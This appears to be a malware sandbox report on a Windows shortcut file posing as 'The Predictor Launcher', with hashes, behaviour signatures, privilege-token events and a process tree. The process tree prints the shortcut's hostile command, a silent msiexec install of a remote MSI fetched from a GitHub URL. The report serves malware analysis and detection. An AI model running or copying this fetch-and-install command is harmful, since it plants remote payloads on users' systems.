5c2213dfe07175eabf7ae8950609569f93bae26019a7c84741b611a96784e1a8

Analysis

max time kernel
117s
max time network
117s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
20/02/2025, 14:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

The Predictor Launcher.tmp.lnk
Size

1KB
MD5

8dbf4ab21c88acc16ba80e2e7e38b7a1
SHA1

d7799dcface5716afa2897e0ab29bd3dc1293f7c
SHA256

5c2213dfe07175eabf7ae8950609569f93bae26019a7c84741b611a96784e1a8
SHA512

01244a05f3d0c230a1b210168f31e8bbb504dbf064c1c9a4ac8095007469b04f78a343cd5d1f2106e849c82d27a2bf66c28e0cfc5b7364c227950459cb864fed

Score

7^/10

Malware Config

Signatures

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
2576	msiexec.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2144	msiexec.exe
6	2144	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2576	msiexec.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2576	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2576	msiexec.exe
Token: SeRestorePrivilege	2144	msiexec.exe
Token: SeTakeOwnershipPrivilege	2144	msiexec.exe
Token: SeSecurityPrivilege	2144	msiexec.exe
Token: SeCreateTokenPrivilege	2576	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2576	msiexec.exe
Token: SeLockMemoryPrivilege	2576	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2576	msiexec.exe
Token: SeMachineAccountPrivilege	2576	msiexec.exe
Token: SeTcbPrivilege	2576	msiexec.exe
Token: SeSecurityPrivilege	2576	msiexec.exe
Token: SeTakeOwnershipPrivilege	2576	msiexec.exe
Token: SeLoadDriverPrivilege	2576	msiexec.exe
Token: SeSystemProfilePrivilege	2576	msiexec.exe
Token: SeSystemtimePrivilege	2576	msiexec.exe
Token: SeProfSingleProcessPrivilege	2576	msiexec.exe
Token: SeIncBasePriorityPrivilege	2576	msiexec.exe
Token: SeCreatePagefilePrivilege	2576	msiexec.exe
Token: SeCreatePermanentPrivilege	2576	msiexec.exe
Token: SeBackupPrivilege	2576	msiexec.exe
Token: SeRestorePrivilege	2576	msiexec.exe
Token: SeShutdownPrivilege	2576	msiexec.exe
Token: SeDebugPrivilege	2576	msiexec.exe
Token: SeAuditPrivilege	2576	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2576	msiexec.exe
Token: SeChangeNotifyPrivilege	2576	msiexec.exe
Token: SeRemoteShutdownPrivilege	2576	msiexec.exe
Token: SeUndockPrivilege	2576	msiexec.exe
Token: SeSyncAgentPrivilege	2576	msiexec.exe
Token: SeEnableDelegationPrivilege	2576	msiexec.exe
Token: SeManageVolumePrivilege	2576	msiexec.exe
Token: SeImpersonatePrivilege	2576	msiexec.exe
Token: SeCreateGlobalPrivilege	2576	msiexec.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 1344 wrote to memory of 2576	1344	cmd.exe	29
PID 1344 wrote to memory of 2576	1344	cmd.exe	29
PID 1344 wrote to memory of 2576	1344	cmd.exe	29
PID 1344 wrote to memory of 2576	1344	cmd.exe	29
PID 1344 wrote to memory of 2576	1344	cmd.exe	29

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\The Predictor Launcher.tmp.lnk"
1⤵
- Suspicious use of WriteProcessMemory
PID:1344
- C:\Windows\System32\msiexec.exe
  "C:\Windows\System32\msiexec.exe" /i https://github.com/leinchchanceleinch/jik/raw/refs/heads/main/d.msi /qn
  2⤵
  - Use of msiexec (install) with remote resource
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of AdjustPrivilegeToken
  PID:2576

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2144

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads